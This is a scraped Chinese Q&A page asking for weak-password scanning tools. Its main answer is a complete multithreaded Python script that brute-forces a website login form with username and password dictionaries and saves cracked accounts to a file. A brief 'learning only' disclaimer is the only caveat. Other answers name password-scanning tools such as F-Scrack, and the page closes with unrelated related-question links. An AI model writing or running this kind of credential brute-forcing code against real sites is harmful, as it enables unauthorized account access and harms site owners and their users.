问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

弱口令自动扫描工具有哪些?

发布网友 发布时间:2022-04-26 19:35

我来回答

4个回答

懂视网 时间:2022-05-11 02:08

今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~

# -*- coding: utf-8 -*-
# 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import urllib2
import urllib
import httplib
import threading
 
headers = {"Content-Type":"application/x-www-form-urlencoded", 
  "Connection":"Keep-Alive",
  "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址
# lock = threading.Lock()
def tryUser(user,password):
 #print user,password
 global headers
 global outFile 
 conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名
 if len(user) < 3: # 限制用户名长度,排除字典中的无用数据
 return # 主动退出线程
 else:
 #lock.acquire() # 多线程操作文件,提前加锁,用后释放
 #line = inFile.readline()
  
 #userData = line.strip().split(' # ') # strip() 默认去除空白字符包括' ','	','
'等
 #lock.release()
 
 user = user.strip()
 passwd = password.strip()
 params = urllib.urlencode({'username': user, 'password': passwd})
 conn.request(method="POST", url="/users/login", body=params, headers=headers) # 后台路径
 responseText = conn.getresponse().read().decode('utf8') # 网页编码
 #print responseText # 第一次可以打印看看是否解析
 if not responseText.find(u'用户名或者密码不正确,请重新输入!') > 0 :
  print '----- find user:', user, 'with password:', passwd, '-----'
  outFile.write(user + ' ' + passwd + '
')
  
 return
 
outFile = open('accounts-cracked.txt', 'w')
 
if __name__ == '__main__':
 tsk=[] # 创建线程池
 with open(r'user.dic', 'r') as fUser: # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口)
 with open(r'pass.dic', 'r') as fPass:
  for user in fUser.readlines():
  for password in fPass.readlines():
   t= threading.Thread(target = tryUser,args=(user,password))
   t.daemon = False # 设置不进行进程守护
   tsk.append(t) # t.start()
  fPass.seek(0)
  # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在
  # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器
  # 也是end了)第二次就没有password 在 fPass中,也就是说 for password in fPass.readlines():
  # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有)
   
   
# join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说,
# 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程
# 不能再thread start之前调用join(), 因为join() 是线程运行时调度
 for t in tsk:
 t.start()
 t.join(1) 
 
 
 
 print "All thread OK,maybe not "
 outFile.close()

热心网友 时间:2022-05-10 23:16

仅供参考

F-Scrack(服务弱口令检测脚本)

功能

一款python编写的轻量级弱口令检测脚本,目前支持以下服务:FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。

弱口令检测脚本 – F-Scrack

热心网友 时间:2022-05-11 00:34

到目前为止,我接触过最多的端口类1433扫弱口令是最多大工具,

热心网友 时间:2022-05-11 02:08

果断流光!

老夫追着版本号用的,就他最顺手~
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
关于电视剧《黄真伊》的插曲 韩剧 黄真伊 片尾曲的中文意思和中文音译 我在淘宝办理退款,接到一个电话喊我登录一个网站,是真的还是假的 藏茶和安化黑茶最注重保存 藏茶和安化黑茶的定义 lq-635k打印机后进纸不吃纸 为什么我在网吧登英雄联盟女朋友马上就知道了 ...我玩过英雄联盟吗?为什么我爸总能知道我什么时候玩的,该怎么删除... 为什么我去网吧玩英雄联盟,我爸都知道?或者说我几点上的电脑都知道... 电信营业厅欺骗手段办理了宽带合约到账现在无法注销。一个月259元 英年,德年,享年是多大岁数 拼多多为什么收到了通讯录已删除的人的好友申请? 拼多多好友图片存在但是显示已失效是什么原因? 秘乐短视频没有更换设备,却提示已更换设备,登录需要验证码? 拼多多好友栏明明|是好友怎么又在朋友添加栏显示已过期? 秘乐短视频我邀请别人,但是对方没有认证,我怎么置换不了了,怎么回事... 拼多多之前关注的好友突然发现已失效,是怎么回事? 充电器是如何给手机充电的? 秘乐短视频置换怎么锁定状态了,怎么开出来? 我的秘乐短视频确定置换按不了,怎么办? 充电器的什么是充电器 秘乐短视频我邀请别人,但是对方没认证我就置换不了了怎么回事,谁能帮我... 什么是职前教师教育 小学的美术教师资格证只能当美术老师吗? 高等学校教师岗前培训合格证书编号如何查询 衡阳市初中教科书是什么版本? 河南非师范类专业幼师资*都有哪些内容?资料由哪些?出版社是什么?还有幼师必须都要会唱歌、跳舞、 范美忠是应该被人赞扬还是鄙视 河南教师资格证考试书籍 2011教师资*用书,????考试科目????初级中学高级级中学考试科目一样吗???谢谢大家了 秘乐短视频换蜜豆为什么总是余额不足? &quot;英年早逝&quot;中的&quot;英年&quot;是什么意思 拼多多一不小心发出了好友申请撤回了对方会知道你给她发好友申请吗? 秘乐短视频换红色名文两次次了,为什么产豆,还不如换一次豆多? 如何利用FTP的弱口令攻击测试漏洞主机 英年早逝的意思是什么? 什么是弱口令 “英年早逝”是什么意思? 拼多多的好友申请被别人选择忽略我能收到提示吗? oracle数据库弱口令检测怎么实现 英年不豫的意思是什么? 英年早逝的意思是什么 风险:1.存在弱口令,利用弱口令admin/admin123成功登录系统 ,可... 英年早婚是什么意思 求一段C语言弱口令检测的代码啊啊啊 英年才俊什么意思 编程扫描弱口令 英年才俊什么意思? 如何自动化检测海康威视设备弱口令 英年早逝的意思。